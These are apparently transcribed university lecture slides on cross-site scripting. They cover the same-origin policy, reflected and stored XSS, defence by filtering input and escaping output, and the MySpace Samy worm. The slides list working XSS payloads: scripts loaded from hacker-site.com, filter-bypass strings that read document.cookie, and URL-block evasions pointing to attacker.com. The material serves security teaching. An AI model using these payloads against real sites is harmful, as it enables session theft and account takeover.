Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Similar documents
CSC 482/582: Computer Security. Cross-Site Security

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

CSC 405 Computer Security. Web Security

CNIT 129S: Securing Web Applications. Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection

Web basics: HTTP cookies

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

Web basics: HTTP cookies

XSS Homework. 1 Overview. 2 Lab Environment

Client Side Injection on Web Applications

Application Layer Attacks. Application Layer Attacks. Application Layer. Application Layer. Internet Protocols. Application Layer.


Information Security CS 526 Topic 11

Common Websites Security Issues. Ziv Perry

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

Web Security II. Slides from M. Hicks, University of Maryland

Information Security CS 526 Topic 8

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

Web Security IV: Cross-Site Attacks

Preparing for the Cross Site Request Forgery Defense

CSCE 813 Internet Security Case Study II: XSS

Web Security. Aggelos Kiayias Justin Neumann

Security for the Web. Thanks to Dave Levin for some slides

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

Computer Security CS 426 Lecture 41

Security for the Web. Thanks to Dave Levin for some slides

Cross-Site Request Forgery: The Sleeping Giant. Jeremiah Grossman Founder and CTO, WhiteHat Security

Web Security: Vulnerabilities & Attacks

Presented By Rick Deacon DEFCON 15 August 3-5, 2007

2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun

CIS 4360 Secure Computer Systems XSS

Content Security Policy

Project 3 Web Security Part 1. Outline

Security+ Guide to Network Security Fundamentals, Third Edition. Chapter 3 Protecting Systems

Web Application Security

WHY CSRF WORKS. Implicit authentication by Web browsers

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

Match the attack to its description:

Client Side Security And Testing Tools

Finding Vulnerabilities in Web Applications

Secure Frame Communication in Browsers Review

shortcut Tap into learning NOW! Visit for a complete list of Short Cuts. Your Short Cut to Knowledge

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

2/16/18. Secure Coding. CYSE 411/AIT 681 Secure Software Engineering. Web Security Outline. The Web. The Web, Basically.

WEB SECURITY: XSS & CSRF

Code-Injection Attacks in Browsers Supporting Policies. Elias Athanasopoulos, Vasilis Pappas, and Evangelos P. Markatos FORTH-ICS

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

Progress Exchange June, Phoenix, AZ, USA 1

Top 10 AJAX security holes & driving factors

Sichere Software vom Java-Entwickler

Browser code isolation

Cross Site Request Forgery

CSCD 303 Essential Computer Security Fall 2018

Hacking Intranet Websites from the Outside

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

Abusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side)

CSP ODDITIES. Michele Spagnuolo Lukas Weichselbaum

Analysis of Hypertext Isolation Techniques for Cross-site Scripting Prevention. Mike Ter Louw Prithvi Bisht V.N. Venkatakrishnan

Web Security: Vulnerabilities & Attacks

Copyright

Homework 5: Exam Review

last time: command injection

Exploiting and Defending: Common Web Application Vulnerabilities

CS 161 Computer Security

Web Application Security. Philippe Bogaerts

Structure of HTTP GET request

Excerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt

THREAT MODELING IN SOCIAL NETWORKS. Molulaqhooa Maoyi Rotondwa Ratshidaho Sanele Macanda

HTTP Security Headers Explained

CS 161 Computer Security

BOOSTING THE SECURITY

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

Web Security, Summer Term 2012

Web Security, Summer Term 2012

Penetration Test Report

Web Security: XSS; Sessions

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

INF3700 Informasjonsteknologi og samfunn. Application Security. Audun Jøsang University of Oslo Spring 2015

Webomania Solutions Pvt. Ltd. 2017

6.170 Tutorial 7 - Rails Security. Prerequisites. Goals of this tutorial. Resources

Project 2: Web Security

CS 161 Computer Security

Avoiding Web Application Flaws In Embedded Devices. Jake Edge LWN.net URL for slides:

P2_L12 Web Security Page 1

We will show you how we bypassed every XSS mitigation we tested. Mitigation bypass-ability via script gadget chains in 16 popular libraries

Application vulnerabilities and defences

CSCD 303 Essential Computer Security Fall 2017

White Paper. New Gateway Anti-Malware Technology Sets the Bar for Web Threat Protection

Flash Ads. Tracking Clicks with Flash Clicks using the ClickTAG

WebGoat Lab session overview

XSSFor the win! What can be really done with Cross-Site Scripting.

EasyCrypt passes an independent security audit

Detecting XSS Based Web Application Vulnerabilities

OWASP Top 10. from a developer s perspective. John Wilander, OWASP/Omegapoint, IBWAS 10

CS 142 Winter Session Management. Dan Boneh

Founded the web application security lab

s642 web security computer security adam everspaugh

Bug-Alcoholic Untamed World of Web Vulnerabilities. OWASP AppSec 2010, University of California Irvine, CA, USA September 10, 2010

Web Security. advanced topics on SOP. Yan Huang. Credits: slides adapted from Stanford and Cornell Tech

Transcription:

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Browser same origin policy Key security principle: a web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin. To be of the same origin is defined as a having the same combination of URI scheme, hostname, and port number. This policy prevents a malicious script on one page from obtaining access to sensitive data on another web page through that page's Document Object Model (DOM). In some cases (e.g., sites with many subdomains) the policy may need to be relaxed (but cautiously). Most attacks against other users involve performing some kind of breach of the same origin policy

Examples of same origin (or not) Examples that follow same origin policy: http://www.examplesite.org/here http://www.examplesite.org/there Examples that violate same origin policy: http://www.examplesite.org/here https://www.examplesite.org/there http://www.examplesite.org:8080/thar http://www.hackerhome.org/yonder

Allowed interactions under same origin hackerhome.org can link to us, can t control <a href="http://www.mywwwservice.com/some_url">click here!</a> Nor include a hidden embedded frame: <iframe style="display:none" src="http://www.mywwwservice.com/some_url"></iframe> No visible cue to the user (note that style attribute hides the iframe) Happens automatically, without user interaction

Allowed interactions under same origin Occasionally, data loaded from one domain is considered to originate from different domain <script src="http://www.mywwwservice.com/some_url></script"> hackerhome can include this script loaded from our site, but it is considered to originate from hackerhome instead Same origin policy prevents JavaScript from another source direct access to our DOM Included script can inspect contents of enclosing page which can define evaluation environment for script

Issues with form submissions Another way attacker can initiate requests from user s browsers to our server: <form name="f" method="post" action="http://www.mywwwservice.com/action"> <input type="hidden" name="cmd" value="do_something">... </form> <script>document.f.submit();</script> Form is submitted to our server without any input from user Only has a hidden input field, nothing visible to user Form has a name, so script can access it via DOM and automatically submit it

Basics of XSS The Godfather of attacks against other users Affects the vast majority of today s applications Two major variations: reflected and stored May be very valuable in a phishing attack May present a critical threat if you can compromise administrative users Should always be viewed in perspective

Basics of XSS

Reflected XSS example

Another example

Stored XSS Data submitted by one user is stored within the application and displayed to other users at a future point Common examples: blog comments, auction questions, social networking messages, site feedback, etc. Attacker can place script into data that gets displayed to other users Avoids need for independent delivery mechanism (email, etc.) Frequently, victims are guaranteed to be logged in at the time of the attack attacker can hijack their session, etc. Often easily wormable XSS can be a misnomer, as sometimes there may not be a cross-site element

Stored XSS example

Common XSS attack vectors <SCRIPT> The <SCRIPT> tag is the most popular way and sometimes easiest to detect. It can arrive to your page in the following forms: External script: <SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT> Embedded script: <SCRIPT> alert( XSS ); </SCRIPT> <BODY> The <BODY> tag can contain an embedded script by using the ONLOAD event, as shown below: <BODY ONLOAD=alert("XSS")> The BACKGROUND attribute can be similarly exploited: <BODY BACKGROUND="javascript:alert('XSS')">

Common XSS attack vectors <IMG> Some browsers will execute a script when found in the <IMG> tag as shown here: <IMG SRC="javascript:alert('XSS');"> There are some variations of this that work in some browsers: <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <IFRAME> The <IFRAME> tag allows you to import HTML into a page. This important HTML can contain a script. <IFRAME SRC= http://hacker-site.com/xss.html >

Common XSS attack vectors <INPUT> If the TYPE attribute of the <INPUT> tag is set to IMAGE, it can be manipulated to embed a script: <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <LINK> The <LINK> tag, which is often used to link to external style sheets could contain a script: <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <OBJECT> The <OBJECT> tag can be used to pull in a script from an external site in the following way: <OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html">

Common XSS attack vectors <TABLE> The BACKGROUND attribute of the TABLE tag can be exploited to refer to a script instead of an image: <TABLE BACKGROUND="javascript:alert('XSS')"> The same applies to the <TD> tag, used to separate cells inside a table: <TD BACKGROUND="javascript:alert('XSS')"> <DIV> The <DIV> tag, similar to the <TABLE> and <TD> tags can also specify a background and therefore embed a script: <DIV STYLE="background-image: url(javascript:alert('xss'))"> The <DIV> STYLE attribute can also be manipulated in the following way: <DIV STYLE="width: expression(alert('xss'));">

Common XSS attack vectors <EMBED> If the hacker places a malicious script inside a flash file, it can be injected in the following way: <EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always"> NOTE: These are some of the more common XSS attack vectors, but by no means should this list be considered complete. New attack vectors are always being explored by attackers. Also modern browsers try to close some of these attack vectors, but older browsers still susceptible and new (but similar) vectors developed will come along.

Basic XSS Defense: FIEO [FILTER INPUT, ESCAPE OUTPUT] If it wasn t abundantly clear already... NEVER TRUST ANY USER INPUT!! Start by always Filtering Input validate for correct data type validate for correct format Finish by always Escaping Output escape HTML and script tags escape other special characters validate for appropriate size strip inappropriate tags, characters

Examples of beating filters If <script> is blocked or filtered "<script)>alert(document.cookie)</script)> "<ScRiPt>alert(document.cookie)</ScRiPt> "%3cscript%3ealert(document.cookie)%3c/script%3e "%253cscript%253ealert(document.cookie)%253c/script%253e %00"<script>alert(document.cookie)</script> Avoid using <script> altogether <x)style="x:expression(alert(document.cookie))>)))[ie] <img)src="")onerror=alert(document.cookie)>)))))))[ie/ff] <body)onload=alert(document.cookie)>))))))))))))))[ie/ff]

Examples of beating filters If you are able to execute some JavaScript but certain expressions are blocked, you can built these dynamically: var$a$=$"alert(doc"$+$"ument.coo"$+$"kie)"6$eval(a)6 var$a$=$"alert("$+$ String.fromCharCode(100,111,99,117,109,101, 110,116,46,99,111,111,107,105,101)$+$")"6$eval(a)6$ [IE/FF] [IE/FF] Javascript obfuscators can also be used in some cases

Examples of beating sanitizers If the filter removes certain expressions altogether, check whether sanitization is applied recursively: <scr<script>ipt> Try inserting a NULL byte to stop some filters: %00<script> If single and double quotes are sanitized, you can encapsulate strings using backticks. If whitespace is blocked or causes truncation, you can run quoted tag attributes together: <img-src=``onerror=alert(document.cookie)>-

Circumventing blocks on absolute URLs If the application blocks any target that begins with http://, try the following: HtTp://attacker.com %00http://attacker.com http://attacker.com22222222[note2the2leading2space] //attacker.com %68%74%74%70%3a%2f%2fattacker.com %2568%2574%2574%2570%253a%252f%252fattacker.com https://attacker.com If the application removes http:// and/or any external domain, try: http://http://attacker.com http://attacker.com/http://attacker.com hthttp://tp://attacker.com If the application checks that the input contains an absolute URL to its own domain, try the following bypasses: http://myapp.com.attacker.com http://attacker.com/?http://myapp.com http://attacker.com/%23http://myapp.com

XSS real world example: MySpace Stored XSS vulnerability discovered in 2005 A user called Samy found a method of circumventing anti- XSS filters to place JavaScript into his user profile He originally wanted to impress his girlfriend by changing In a relationship to In a hot relationship He then tried to make some new friends... He wrote a script which caused anyone viewing it to add Samy as a friend, and to copy the script into their own profile (also adding the phrase Samy is my hero to infected profiles) The result was an exponential worm which brought down the MySpace site

MySpace worm in 24 hours 12:34 pm: You have 73 friends. I decided to release my little popularity program. I'm going to be famous...among my friends. 1:30 am: You have 73 friends and 1 friend request. One of my friends' girlfriend looks at my profile. She's obviously checking me out. I approve her inadvertent friend request and go to bed grinning. 8:35 am: You have 74 friends and 221 friend requests. Woah. I did not expect this much. I'm surprised it even worked.. 200 people have been infected in 8 hours. That means I'll have 600 new friends added every day. Woah. 9:30 am: You have 74 friends and 480 friend requests. Oh wait, it's exponential, isn't it. Sh*t.

MySpace worm in 24 hours 6:20 pm: I timidly go to my profile to view the friend requests. 2,503 friends. 917,084 friend requests. Samy was raided by the Secret Service, arrested, and given three years probation; MySpace had to be shut down until it could be secured; The phrase "Samy is my hero" remained in tens of thousands of MySpace profiles

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback